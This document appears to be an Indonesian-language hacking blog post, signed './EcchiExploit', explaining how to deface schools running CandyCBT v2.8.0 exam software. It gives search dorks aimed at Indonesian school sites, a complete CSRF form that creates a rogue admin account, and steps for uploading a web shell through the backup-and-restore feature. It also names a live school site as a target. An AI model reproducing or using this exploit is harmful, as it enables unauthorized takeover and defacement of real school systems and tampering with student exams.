CandyCBT v2.8.0 r !!!add admin
Heyoyo bree bertemu dengan saya lagi kali ini gua upload cara deface candy CBT iya yang biasanya di sebut Computer Basics Test tu loh buat ujian sekolah gak tau gak usah sekolah bree: (admin
Langsung saja ke tutornya
1.Dork:
~> "Responsive Image" + "Support" intitle:Login
~> intex support by candy cbt v2.8.0
~> inurl: login CBT site:.sch.id
2.shell banyak di google terserah mau pake yng mana
3.Crsf add mimin
<html>
<head></head>
<body>
<form action="https://mantanlucnut.cok/admin/?pg=pengawas" method="post">
<label>nip</label>
<input type="text" name="nip" value="123761717" required="true" />
<br>
<label>nama</label>
<input type="text" name="nama" required="true" />
<br>
<label>username</label>
<input type="text" name="username" required="true" />
<br>
<label>password</label>
<input type="password" name="pass1" required="true" />
<br>
<label>ulang password</label>
<input type="password" name="pass2" required="true" />
<br>
<button type="submit" name="submit">simpan</button>
</form>
</body>
</html>
Pertama kalian dorking dulu pakek dork di atas bree yang dah gua siapin
Nahh kalian pilih salah satu targetnya bree ingat bree pilih yang v2.8. Karena ini tutorialnya untuk v2.8.
Disini gua udah punya target
Terus kalian salin Crsf add mimin tadi kalian tinggal edit di bagian ini
<form action="https://mantanlucnut.cok/admin/?pg=pengawas" method="post"
nahh kalo sudah kalian tinggal simpan berformat HTML bree
Terus kalian cari filenya kalian simpan di mana terus kalian buka dengan chrome/browser
Nahh nanti tampilan gambar seperti ini bree kalian tinggal isi user sama pass nya sesuai keinginan kalian kalok udah selesai isi user sama pass nya tinggal kalian simpan nanti otomatis masuk ke halaman login web target tersebut bree
Nahh kalian tinggal masukkan user dan pass yang kalian bikin bree ingat jangan sampai salah bree:)
Nahh nangi otomatis masuk ke dashboard mimin terserah kalian mau apain web kalian:)
Jika kalian mau upload shell kalian tinggal pergi ke pengaturan cari yang namanya backup & restore.
untuk path/tempat shell, ada di /admin/
Contoh : https://sekolahku.sch.id/admin/yourshell.php
https://sekolahku.sch.id/admin/[patch]/yourshell.php
Live target
http://www.sman2tumijajar.com/login.php
Mungkin skian kalo ada salah moon maap
Thnks
./EcchiExploit
Would u pls give me yr email address?
ReplyDelete